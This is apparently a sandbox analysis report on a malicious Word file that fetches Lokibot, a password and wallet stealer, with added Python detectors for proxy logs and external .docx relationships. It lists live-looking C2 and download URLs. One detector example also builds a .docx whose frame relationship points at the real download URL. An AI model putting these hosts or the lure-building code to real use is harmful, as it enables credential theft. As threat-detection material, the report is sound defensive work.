new_order.doc.docx

General
Target

new_order.doc.docx

Size

10KB

Sample

210421-fkdn2c39d6

Score
10/10
MD5

eb9b4decb03b5c81b5f4c0cc9dd5758f

SHA1

22ee73cf80deaf3122cc4e9fd45b062f71b4e2f4

SHA256

ce47c3f3359a2f2dd2de306544df0e10cf5cefebfccf8d556432918622487f25

SHA512

f3baddcc36936c75ae6efc335db1bc53d6c9827c840dc34e1a9afe58a2dc9c1c285089986f165a2b0451eb1fb9a18d18143ef3f2c29b04aaccfb297f04c173ad

Malware Config

Extracted

Rule Microsoft Office WebSettings Relationship
C2

http://bit.do/fQyhA

Extracted

Family lokibot
C2

http://amrp.tw/kayo/gate.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php
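
The URLs extracted above are what a responder sweeps proxy and DNS logs for. The following is an added example, not part of the sandbox report: a Python matcher that normalises the URL in each log line (host case, default port, query string) and checks it against the extracted URLs in tiers: exact host and path, known host with a different path (C2 paths rotate), and, as a weaker heuristic, a POST to one of the Lokibot gate paths on an unknown host. The log lines and their field layout (timestamp, client, method, URL, status) are constructed for the demonstration, and the IOC labels are mine, not the sandbox's.

```python
"""Match sandbox-extracted URLs against proxy log lines.

Added example for this report, not code from the sandbox or the analysis
page. The IOC URLs are the ones the report extracted; the proxy log lines
and their field layout (timestamp client method url status) are constructed.
"""
from urllib.parse import urlsplit

# URLs extracted by the sandbox, as listed in the report. Labels are mine.
IOC_URLS = {
    "http://bit.do/fQyhA": "office-websettings-download",
    "http://amrp.tw/kayo/gate.php": "lokibot-c2",
    "http://kbfvzoboss.bid/alien/fre.php": "lokibot-c2",
    "http://alphastand.trade/alien/fre.php": "lokibot-c2",
    "http://alphastand.win/alien/fre.php": "lokibot-c2",
    "http://alphastand.top/alien/fre.php": "lokibot-c2",
}

# Constructed log lines (assumed format, not a real product's). Note the
# uppercase host, explicit :80 and query string: the matcher normalises these.
SAMPLE_LOG = """\
2021-04-21T10:01:02Z 10.0.0.5 GET http://bit.do/fQyhA 302
2021-04-21T10:01:09Z 10.0.0.5 POST http://kbfvzoboss.bid/alien/fre.php 404
2021-04-21T10:01:10Z 10.0.0.5 POST http://alphastand.trade/alien/fre.php 200
2021-04-21T10:02:00Z 10.0.0.7 GET https://www.example.com/index.php 200
2021-04-21T10:03:33Z 10.0.0.5 POST http://amrp.tw/kayo/gate.php?x=1 200
2021-04-21T10:04:00Z 10.0.0.9 POST http://ALPHASTAND.TOP:80/alien/fre.php 200
2021-04-21T10:04:30Z 10.0.0.9 GET http://alphastand.win/ 200
2021-04-21T10:05:00Z 10.0.0.9 POST http://198.51.100.23/alien/fre.php 200
"""


def normalize(url):
    """Return (host, path): lowercase host without port, path without query."""
    parts = urlsplit(url.strip())
    return (parts.hostname or "").lower(), (parts.path or "/")


def build_index(ioc_urls):
    """Index IOCs three ways: exact (host, path), host only, Lokibot gate paths."""
    exact, hosts, gate_paths = {}, {}, set()
    for url, label in ioc_urls.items():
        host, path = normalize(url)
        exact[(host, path)] = label
        hosts.setdefault(host, label)
        if label == "lokibot-c2":
            gate_paths.add(path)
    return exact, hosts, gate_paths


def match_log(log_text, ioc_urls=IOC_URLS):
    """Return (client, url, label, reason) for each line that matches an IOC.

    Tiered: an exact host+path hit is strongest; a known C2 host with another
    path still counts (C2 paths rotate); a POST to a Lokibot gate path on an
    unknown host is a weaker heuristic and is labelled with a question mark.
    """
    exact, hosts, gate_paths = build_index(ioc_urls)
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue  # blank or malformed line
        _ts, client, method, url, _status = fields[:5]
        host, path = normalize(url)
        if (host, path) in exact:
            hits.append((client, url, exact[(host, path)], "exact IOC URL"))
        elif host in hosts:
            hits.append((client, url, hosts[host], "known IOC host, different path"))
        elif method == "POST" and path in gate_paths:
            hits.append((client, url, "lokibot-c2?",
                         "POST to Lokibot gate path on unknown host"))
    return hits


if __name__ == "__main__":
    for hit in match_log(SAMPLE_LOG):
        print(*hit, sep="\t")
```

The 404 on kbfvzoboss.bid is still reported: a dead or sinkholed C2 domain tells you the host tried to beacon, which is the point of the sweep. The path-only tier is deliberately last and flagged as uncertain; on its own it would also fire on an unrelated server that happens to serve a file called fre.php.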

Targets
Target

new_order.doc.docx

Signatures

  • Lokibot

    Description

    Lokibot is a password and cryptocurrency wallet stealer.

  • Blocklisted process makes network request

  • Downloads MZ/PE file

  • Executes dropped EXE

  • Abuses OpenXML format to download file from external location

  • Loads dropped DLL

  • Uses the VBS compiler for execution

    TTPs

    Scripting

  • Suspicious use of SetThreadContext
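
The signature "Abuses OpenXML format to download file from external location" and the "Microsoft Office WebSettings Relationship" extraction above describe the same mechanism: a relationships part inside the .docx package whose Target is an external URL, which Word fetches when the document is opened, with no macro involved. The following is an added example, not code from the sandbox or from the report: a Python scanner that walks every .rels part in a .docx and reports relationships with TargetMode="External", separating types Word resolves on open (frame, attachedTemplate, oleObject) from ordinary hyperlinks, which are external too but only resolve on click. The sample document is constructed in memory around the URL the report extracted; the set of fetch-on-open relationship types is my own judgement, not something the report states.

```python
"""Scan a .docx for External-mode relationships.

Added example for this report, not code from the sandbox or the page. The
document below is constructed in memory around the URL the report extracted;
the real sample is not needed. FETCH_ON_OPEN is my own list of relationship
types that Word resolves when the file opens, without macros.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Relationship types Word resolves on open. An External target on one of these
# is the "download file from external location" behaviour; a hyperlink is
# External too but only resolves when clicked, so it is reported unflagged.
FETCH_ON_OPEN = {
    OFFICE_REL + "frame",             # webSettings.xml frameset (this sample)
    OFFICE_REL + "attachedTemplate",  # settings.xml remote template
    OFFICE_REL + "oleObject",         # document.xml linked OLE object
}

REL_TPL = '<Relationship Id="%s" Type="%s" Target="%s"%s/>'
EXTERNAL = ' TargetMode="External"'


def relationships(*items):
    """Render a Relationships part from (id, type, target, suffix) tuples."""
    body = "".join(REL_TPL % item for item in items)
    return '<Relationships xmlns="%s">%s</Relationships>' % (PKG_REL_NS, body)


def build_sample_docx(url):
    """Construct a minimal .docx whose webSettings frameset points at url.

    A constructed stand-in, not the analysed sample. It also carries a benign
    external hyperlink so both scanner verdicts can be seen side by side.
    """
    parts = {
        "[Content_Types].xml":
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
            '<Default Extension="xml" ContentType="application/xml"/>'
            '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
            '<Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/>'
            '</Types>',
        "_rels/.rels": relationships(
            ("rId1", OFFICE_REL + "officeDocument", "word/document.xml", "")),
        "word/document.xml":
            '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
            '<w:body><w:p><w:r><w:t>new order</w:t></w:r></w:p></w:body></w:document>',
        "word/_rels/document.xml.rels": relationships(
            ("rId1", OFFICE_REL + "webSettings", "webSettings.xml", ""),
            ("rId2", OFFICE_REL + "hyperlink", "https://www.example.com/", EXTERNAL)),
        "word/webSettings.xml":
            '<w:webSettings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
            'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
            '<w:frameset><w:frame><w:name w:val="f1"/><w:sourceFileName r:id="rId1"/></w:frame></w:frameset>'
            '</w:webSettings>',
        "word/_rels/webSettings.xml.rels": relationships(
            ("rId1", OFFICE_REL + "frame", url, EXTERNAL)),
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, xml in parts.items():
            z.writestr(name, '<?xml version="1.0" encoding="UTF-8"?>' + xml)
    return buf.getvalue()


def external_relationships(docx_bytes):
    """Return (rels_part, id, short_type, target, fetch_on_open) for every
    relationship with TargetMode="External" in any .rels part of the package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.lower().endswith(".rels"):
                continue
            try:
                root = ET.fromstring(z.read(name))
            except ET.ParseError:
                continue  # a corrupt rels part deserves a look, but not here
            for r in root.iter("{%s}Relationship" % PKG_REL_NS):
                if r.get("TargetMode", "Internal").lower() != "external":
                    continue
                rtype = r.get("Type", "")
                findings.append((name, r.get("Id", ""), rtype.rsplit("/", 1)[-1],
                                 r.get("Target", ""), rtype in FETCH_ON_OPEN))
    return findings


def fetch_on_open_targets(docx_bytes):
    """Only the URLs Word would fetch on open, the sandbox's extracted URL here."""
    return [t for _, _, _, t, hot in external_relationships(docx_bytes) if hot]


if __name__ == "__main__":
    sample = build_sample_docx("http://bit.do/fQyhA")  # URL from the report
    for finding in external_relationships(sample):
        print(finding)
```

Run it against a real .docx by reading the file's bytes into external_relationships(); the .doc.docx double extension on this sample is only a lure, the container is still a zip. The scanner reads every .rels part rather than just webSettings.xml.rels, since the same External-mode trick appears in settings.xml.rels (remote template) and document.xml.rels (linked OLE), and a missing TargetMode is treated as Internal, which is what the OOXML default means.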

MITRE ATT&CK Matrix

Collection, Command and Control, Credential Access, Defense Evasion, Exfiltration, Impact, Initial Access, Lateral Movement, Persistence, Privilege Escalation

Tasks

static1  10/10
behavioral1  10/10
behavioral2  1/10